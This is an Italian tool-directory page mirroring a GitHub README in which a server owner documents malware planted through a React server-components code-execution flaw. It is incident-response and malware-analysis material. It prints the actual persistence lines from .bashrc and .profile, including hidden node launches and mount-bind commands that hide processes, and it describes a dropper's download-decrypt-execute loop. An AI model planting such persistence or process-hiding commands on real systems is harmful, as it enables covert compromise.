Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
react-cve-2025-55182 — malware che ho trovato sul mio server | Kitploit
Strumenti/GitHubGitHub/stonelinks/react-cve-2025-55182
Meccanismi di PersistenzaReverse EngineeringEsfiltrazione DatiInformatica ForenseAnalisi MalwareCommand and ControlThreat IntelligenceRisposta agli IncidentiSviluppo Payload
GitHubstonelinks/react-cve-2025-55182

react-cve-2025-55182

malware che ho trovato sul mio server

8 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

react-cve-2025-55182

Questo è un dump di malware e altra robaccia sospetta che ho trovato sul server del mio sito di matrimonio a seguito dell'exploit di esecuzione di codice lato server di React. Si tratta di un piccolo droplet Digital Ocean che esegue una banale app Next js.

Il CVE: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

Un log dell'attività del server che mostra vari picchi e cose varie: image

Il principale cattivo sembra essere questa cosa installata in /.local/share/.r0qsv8h1

Cosa ho trovato

Nel mio bashrc:

root@kitploit:~
# System
(nohup /.local/share/.r0qsv8h1/.394ly8v9/bin/node /.local/share/.r0qsv8h1/.fvq2lzl64e.js >/dev/null 2>&1 &) 2>/dev/null
pgrep -f mesh | xargs -I {} mount -n --bind /dev/shm /proc/{} 2>/dev/null
pgrep -f mesh | xargs -I {} mount -n --bind /dev/shm /proc/{} 2>/dev/null
pgrep -f mesh | xargs -I {} mount -n --bind /dev/shm /proc/{} 2>/dev/null

Nota: i pgreps servono per fermare questo altro falso malware "meshagent" dall'esecuzione. Puoi leggere al riguardo nel documento MESHAGENT.md.

Nel mio profile c'è la stessa cosa:

root@kitploit:~
# App
(/.local/share/.r0qsv8h1/.394ly8v9/bin/node /.local/share/.r0qsv8h1/.fvq2lzl64e.js >/dev/null 2>&1 &) 2>/dev/null

Puoi vedere altri servizi sospetti in SUSPICIOUS_SERVICES.md

Ecco un'analisi di questo malware principale:

Panoramica della roba in /.local/

La directory bad contiene un runtime Node.js autonomo con un set di file JavaScript pesantemente offuscati.
Tutte le prove indicano che si tratta di un dropper malintenzionato che contatta silenziosamente un server remoto, scarica un payload crittografato, lo decifra, lo scrive su disco e lo esegue come processo in background distaccato. Il codice controlla periodicamente il server per aggiornamenti.

File e loro scopo

Decodifica del manifest

Il payload Base64 in .5f8562 decodifica in:

root@kitploit:~
{
  "0": "c6aeb84b-0600-4e82-ae3e-f7d441a2fd7c",
  "1": ".fvq2lzj6te.js",
  "3": 1765307786421,
  "4": "desktop"
}
  • Chiave "1" fa riferimento al loader offuscato principale.
  • Chiave "0" è un UUID probabilmente usato dal server remoto per il tracciamento.
  • Chiave "3" è un timestamp (ms Unix‑epoch) che indica quando il manifest è stato generato.
  • Chiave "4" indica la posizione prevista (desktop), suggerendo che il payload potrebbe tentare di nascondersi lì.

Flusso di esecuzione

  1. Avvio – Quando il binario Node bundle viene avviato (es., node .5f8562), il manifest punta a .fvq2lzj6te.js.
  2. Downloader – Il loader crea una richiesta JSON‑RPC a un server di comando e controllo remoto, riceve un blob codificato in base64 e lo decifra usando un algoritmo personalizzato simile a RC4.
  3. Distribuzione del payload – I dati decifrati vengono scritti in un file con nome casuale nell'ambiente dell'utente ed eseguiti come processo figlio distaccato.
  4. Persistenza / Ciclo di aggiornamento – Un timer setInterval ripete periodicamente la sequenza download‑decifra‑esegui, permettendo all'attaccante di inviare nuovi payload aggiornati senza ulteriore interazione da parte dell'utente.
  5. Esecuzione in background – Il processo avviato viene eseguito con il proprio ambiente (PATH, cwd, ecc.) e può compiere azioni malintenzionate tipiche come cryptomining, furto di credenziali o esecuzione di comandi remoti.

Impatto potenziale

  • Compromissione del sistema – Esecuzione di codice arbitrario con i privilegi dell'utente che ha avviato il runtime Node.
  • Persistenza – Il polling periodico assicura che il malware possa essere aggiornato o sostituito in qualsiasi momento.
  • Abuso di risorse – Probabilmente esegue attività ad alto consumo di CPU (es., mining di criptovalute) o esfiltra dati.
  • Furtività – I file sono pesantemente offuscati e la presenza di un README di Node dall'aspetto legittimo aiuta a nascondere la natura malintenzionata.

Raccomandazioni

  1. Rimozione immediata – Cancellare l'intera directory .r0qsv8h1 e qualsiasi file che potrebbe aver creato (controllare la Desktop dell'utente e le directory temporanee per eseguibili appena creati).
  2. Scansione del sistema – Eseguire un scanner antimalware affidabile sull'host per rilevare eventuali componenti residui.
  3. Verificare i percorsi di esecuzione – Assicurarsi che nessuno script di avvio o attività pianificata faccia riferimento a file in questa directory.
  4. Monitoraggio della rete – Bloccare le connessioni in uscita verso IP/host sconosciuti dalla macchina colpita e rivedere il traffico di rete recente per richieste in uscita sospette.
  5. Aggiornare le policy di sicurezza – Limitare l'esecuzione di binari e script sconosciuti, specialmente quelli scaricati in posizioni scrivibili dall'utente.

Questa analisi è stata eseguita automaticamente da un assistente AI basandosi su un esame statico dei file presenti nella directory. Non è stata effettuata alcuna esecuzione runtime.

Puoi leggere di più in DEOBFUSCATE.md

Scarica lo strumento
FileDescrizione
.394ly8v9/README.mdREADME standard di Node.js – non correlato alla funzionalità malintenzionata; presente solo per far sembrare il bundle legittimo.
.fvq2lzl64e.jsCirca 5 KB di JavaScript offuscato. Costruisce una richiesta HTTP JSON‑RPC, riceve un payload codificato in base64, lo decifra con un cifrario personalizzato, scrive il payload in un file casuale e lo esegue tramite child_process.spawn / execSync. Inoltre avvia un processo in background distaccato che interroga ripetutamente il server remoto.
.lauphhtqrg.jsCirca 13 KB di JavaScript offuscato. Implementa un ciclo simile download‑decifra‑esegui con il proprio cifrario stile RC4 (dec). Scrive il payload decifrato in un nome file generato e lo esegue. Imposta un timer per recuperare nuovi payload successivamente.
.5f8562Stringa Base64 in chiaro. Decodifica in un piccolo manifest JSON: json { "0":"c6aeb84b-0600-4e82-ae3e-f7d441a2fd7c", "1":".fvq2lzj6te.js", "3":1765307786421, "4":"desktop" } Questo manifest dice al loader quale script eseguire (.fvq2lzj6te.js) e fornisce un identificatore/timestamp.
.b0rtqscrkeovNon ancora esaminato, ma il pattern del nome suggerisce che sia un altro componente della stessa catena malintenzionata.
bin/node e file lib/ annessiUn runtime Node.js completo, che permette agli script di funzionare su un sistema anche se Node.js non è installato.